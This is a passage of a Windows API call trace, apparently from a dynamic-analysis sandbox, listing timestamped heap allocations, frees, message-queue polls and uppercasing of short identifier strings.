wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0166.176] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0166.176] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0166.176] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0166.176] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0166.176] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0166.176] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0166.176] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa550 [0166.176] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0166.176] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0166.176] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0166.176] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0166.176] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0166.176] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0166.176] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0166.176] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0166.176] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0166.176] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0166.176] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c18 | out: hHeap=0x25c0000) returned 1 [0166.176] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0166.176] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bc8 | out: hHeap=0x25c0000) returned 1 [0166.176] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0166.176] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0166.177] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0166.177] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0166.177] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0166.177] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0166.177] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0166.177] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0166.177] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0166.177] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0166.177] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bc8 [0166.177] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2d28 [0166.177] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0166.177] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bc8 | out: hHeap=0x25c0000) returned 1 [0166.177] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0166.177] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9570 [0166.177] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0166.177] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0166.177] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0166.177] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0166.177] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0166.177] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0166.177] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0166.177] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0166.177] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0166.177] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2088 [0166.178] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bc8 [0166.178] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0166.178] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bc8 | out: hHeap=0x25c0000) returned 1 [0166.178] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0166.178] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0166.178] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0166.178] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0166.178] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0166.178] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0166.178] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0166.178] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0166.178] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0166.178] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0166.178] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0166.178] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0166.178] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0166.178] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0166.178] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0166.178] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0166.178] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0166.178] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0166.178] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0166.179] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0166.179] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0166.179] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0166.179] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0166.179] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0166.179] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0166.179] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0166.179] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0166.179] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0166.179] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0166.179] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0166.179] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0166.179] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0166.179] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0166.179] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0166.179] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0166.179] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0166.179] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8a0 | out: hHeap=0x25c0000) returned 1 [0166.179] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0166.179] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d50 | out: hHeap=0x25c0000) returned 1 [0166.179] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0166.180] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6af8 | out: hHeap=0x25c0000) returned 1 [0166.180] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0166.180] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0166.180] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa658 | out: hHeap=0x25c0000) returned 1 [0166.180] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0166.180] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0166.180] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0166.180] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0166.180] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a18 | out: hHeap=0x25c0000) returned 1 [0166.180] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416490 | out: hHeap=0x25c0000) returned 1 [0166.180] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0166.180] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0166.180] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0166.180] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d00 | out: hHeap=0x25c0000) returned 1 [0166.180] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0166.180] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b70 | out: hHeap=0x25c0000) returned 1 [0166.180] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0166.180] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bf0 | out: hHeap=0x25c0000) returned 1 [0166.180] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0166.180] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0166.180] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0166.180] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0166.181] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0166.181] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0166.181] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e30 [0166.181] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0166.181] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0166.181] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0166.181] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0166.181] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0166.181] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0166.181] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bf0 [0166.181] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1468 [0166.181] CharUpperBuffW (in: lpsz="A4E00301934", cchLength=0xb | out: lpsz="A4E00301934") returned 0xb [0166.181] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bf0 | out: hHeap=0x25c0000) returned 1 [0166.181] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0166.181] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa830 [0166.181] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1468 [0166.181] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0166.181] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0166.181] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0166.181] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac978 [0166.181] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0166.182] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b2058 [0166.182] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0166.182] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0166.182] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0166.182] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24ac9f0 [0166.182] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bf0 [0166.182] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0166.182] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2d28 [0166.182] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0166.182] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b70 [0166.182] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0166.182] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0166.182] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d00 [0166.182] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0166.182] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c18 [0166.182] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0166.182] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c60 [0166.182] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0166.182] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0166.182] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa2f8 [0166.183] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0166.183] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa358 [0166.183] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0166.183] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0166.183] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6af8 [0166.183] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa658 [0166.183] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2088 [0166.183] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa658 | out: hHeap=0x25c0000) returned 1 [0166.183] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d50 [0166.183] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa658 [0166.183] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0166.183] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0166.183] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0166.183] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0166.183] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8a0 [0166.183] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0166.183] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0166.183] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dc8 [0166.183] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0166.183] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa358 [0166.184] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2658 [0166.184] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2f8 [0166.184] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0166.184] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2658 [0166.184] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bc8 [0166.184] CharUpperBuffW (in: lpsz="SSA4E00301934", cchLength=0xd | out: lpsz="SSA4E00301934") returned 0xd [0166.184] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bc8 | out: hHeap=0x25c0000) returned 1 [0166.184] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0166.184] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0166.184] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0166.184] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0166.184] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0166.184] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0166.184] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0166.184] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0166.184] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0166.184] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0166.184] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0166.184] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dd8 [0166.184] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0166.184] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bc8 [0166.185] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0166.185] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa358 [0166.185] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dc8 [0166.185] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c18 [0166.185] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2f8 [0166.185] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2658 [0166.185] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0166.185] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c88 [0166.185] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2f8 [0166.185] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0166.185] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bc8 | out: hHeap=0x25c0000) returned 1 [0166.185] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0166.185] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0166.185] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0166.185] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0166.185] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dd8 [0166.185] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0166.185] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bc8 [0166.185] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0166.185] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa460 [0166.185] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2db8 [0166.185] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3cb8 [0166.186] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa538 [0166.186] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16b8 [0166.186] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0166.186] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3a88 [0166.186] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa538 [0166.186] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0166.186] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bc8 | out: hHeap=0x25c0000) returned 1 [0166.186] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0166.186] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0166.186] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0166.186] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0166.186] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dd8 [0166.186] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, 